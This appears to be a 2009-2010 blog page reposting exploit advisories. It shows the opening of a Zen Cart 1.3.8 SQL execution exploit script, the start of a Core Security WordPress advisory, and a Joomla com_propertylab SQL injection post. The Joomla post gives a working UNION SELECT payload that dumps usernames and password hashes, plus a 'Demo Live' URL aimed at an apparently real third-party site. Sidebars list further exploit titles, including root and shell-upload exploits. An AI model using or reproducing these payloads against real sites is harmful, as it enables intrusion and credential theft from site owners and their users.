#!/usr/bin/python
#
# ——- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within
reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH
#
#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` =
(SELECT `record_company_id` FROM `record_company` WHERE `
record_company_image` = ‘8d317.php’ LIMIT 1);
# DELETE [...]
All about information from internet
You can get some information about internet from here
28
Jul
1 comment
28
Jul
WordPress Privileges Unchecked in admin.php and Multiple Information
Posted by admin Published in Software—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
WordPress Privileges Unchecked in admin.php and Multiple Information
Disclosures
1. *Advisory Information*
Title: WordPress Privileges Unchecked in admin.php and Multiple
Information Disclosures
Advisory ID: CORE-2009-0515
Advisory URL:
http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
Date published: 2009-07-08
Date of last update: 2009-07-08
Vendors contacted: WordPress
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Local file include, Privileges unchecked, Cross site scripting
(XSS), Information disclosure
Remotely Exploitable: Yes
Locally [...]
28
Jul
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
Posted by admin Published in Hacking————————————————————————–
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
————————————————————————–
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################
Example:
http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>
<Sql Code>:
+and+1=2+union+select+1,2,3,4,5,6,concat(username,0×3a,password)+from+jos_users
Demo Live (1):
http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0×3a,password)+from+jos_users
Thanks for all [...]
Top Search
Recent Posts
- PHP-Fusion Local File Inclusion Vulnerability
- Joomla Component (com_equipment) SQL Injection Vulnerability
- Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
- Joomla Component OnGallery SQL Injection Vulnerability
- 123 Flashchat version 7.8 Multiple Remote Vulnerabilities
- Cpanel v11.25 CSRF Add FTP Account Exploit
- EZ-Oscommerce 3.1 Remote File Upload
- Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability
- Joomla Component com_spa SQL Injection Vulnerability
- Ubuntu PAM MOTD Local Root Exploit
Visitor
Archives
- August 2010 (5)
- July 2010 (6)
- June 2010 (8)
- May 2010 (5)
- March 2010 (7)
- February 2010 (25)
- January 2010 (21)
- December 2009 (18)
- November 2009 (16)
- October 2009 (6)
- September 2009 (14)
- August 2009 (16)
- July 2009 (10)
- June 2009 (3)
- April 2009 (4)
- March 2009 (3)
- February 2009 (15)
- January 2009 (29)
- December 2008 (54)
- November 2008 (44)
- October 2008 (30)
Recent Entries
- PHP-Fusion Local File Inclusion Vulnerability
- Joomla Component (com_equipment) SQL Injection Vulnerability
- Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
- Joomla Component OnGallery SQL Injection Vulnerability
- 123 Flashchat version 7.8 Multiple Remote Vulnerabilities
- Cpanel v11.25 CSRF Add FTP Account Exploit
- EZ-Oscommerce 3.1 Remote File Upload
- Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability
- Joomla Component com_spa SQL Injection Vulnerability
- Ubuntu PAM MOTD Local Root Exploit
Recent Comments
- admin in Joomla 1.5.x (Token) Remote Admin Change Password …
- boinionfoky in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- FXbee in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- sam in Joomla 1.5.x (Token) Remote Admin Change Password …
- Wourpigurge in phpBB3 addon prime_quick_style GetAdmin Exploit
- laspadalsecoB in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- slabbanyfam in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
- bah in Zen Cart 1.3.8 Remote SQL Execution Exploit
- sehummel in Joomla 1.5.x (Token) Remote Admin Change Password …
- sehummel in Joomla Component com_ContentBlogList SQL Injection…
Random Selection of Posts
- Speedy v1.0 Remote Shell Upload Vulnerability
- Joomla (com_photoblog) Blind Sql Injection Vulnerability
- WSN Guest Database Disclosure Vulnerability
- F3Site2009 Multiple LFI Exploit
- CuteFTP Pro 8.0.2
- DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
- Joomla Component (com_equipment) SQL Injection Vulnerability
© 2008 All about information from internet is proudly powered by WordPress
Theme designed by MILD-INFO.COM
Theme designed by MILD-INFO.COM